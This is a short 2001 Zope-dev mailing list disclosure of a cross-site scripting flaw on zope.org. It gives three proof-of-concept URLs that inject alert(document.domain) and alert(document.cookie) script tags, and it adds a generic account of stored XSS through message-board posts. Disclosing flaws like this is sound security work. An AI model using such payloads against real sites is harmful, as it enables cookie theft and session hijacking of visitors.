[Zope-dev] New: Cross Site Scripting vulnerability
ALife
ALife" <buginfo@inbox.ru
Sun, 23 Sep 2001 17:23:32 +0000 (GMT)
Example:
http://www.zope.org/Documentation/<SCRIPT>alert(document.domain)</SCRIPT>
http://www.zope.org/lalalalal<SCRIPT>alert(document.domain)</SCRIPT>
http://www.zope.org/<SCRIPT>alert(document.cookie)</SCRIPT>
For example, an attacker might post a message like
Hello message board. This is a message.
<SCRIPT>malicious code</SCRIPT>
This is the end of my message.
When a victim with scripts enabled in their browser reads this
message, the malicious code may be executed unexpectedly.
Scripting tags that can be embedded in this way include <SCRIPT>,
<OBJECT>, <APPLET>, and <EMBED>.